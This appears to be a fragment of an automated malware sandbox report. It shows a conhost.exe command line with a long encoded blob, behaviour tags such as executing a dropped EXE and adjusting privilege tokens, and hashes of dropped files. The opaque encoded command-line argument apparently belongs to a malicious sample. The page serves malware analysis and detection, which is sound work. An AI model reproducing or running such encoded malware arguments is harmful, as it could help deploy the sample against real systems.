C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe nqsldvclynffpxop1 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⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD538ced0c1e0ab1e75bbf803ba204443a5
SHA143c087377b81d8aff5075f3891453acbdb0193da
SHA2562ee5cabaf23d23eee5f9f227abe51b349fe3caf6187a44f5471c053a7c2dfc55
SHA5122fd24e47a16b411758b97aca2002b9d1e571bef010f5b38c0d14cc024a629d29e96e9e8de1e598a3a01305ec4f8d776cdedf66c74de708bd0d12166ee76503f7
-
Filesize
4.3MB
MD54f0dcfb8b8cf69bb60c7c051554f0fc5
SHA1992f2bf6e63b6894c6f5311efa2cf908e50621d1
SHA25606b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130
SHA512936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c
-
Filesize
4.3MB
MD54f0dcfb8b8cf69bb60c7c051554f0fc5
SHA1992f2bf6e63b6894c6f5311efa2cf908e50621d1
SHA25606b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130
SHA512936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c
-
Filesize
4KB
MD51f555cac34c1df424f6f21fed8a628bc
SHA1dfcdccfbed91737145620e2e16ac260c530aa007
SHA2563245c007a797d0cb887caa71ce6a05252581902536a5ee4189a4be141a26f8f8
SHA5128c85eb8b7f9b528f81aa60690accbfef5a354422c6bb8a446b0b227a63f7f625d670e6c2e45ff47d8913c382ba9f3d71faf9860af1adaf10e7c5eec99326f351
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
4.3MB
MD54f0dcfb8b8cf69bb60c7c051554f0fc5
SHA1992f2bf6e63b6894c6f5311efa2cf908e50621d1
SHA25606b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130
SHA512936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c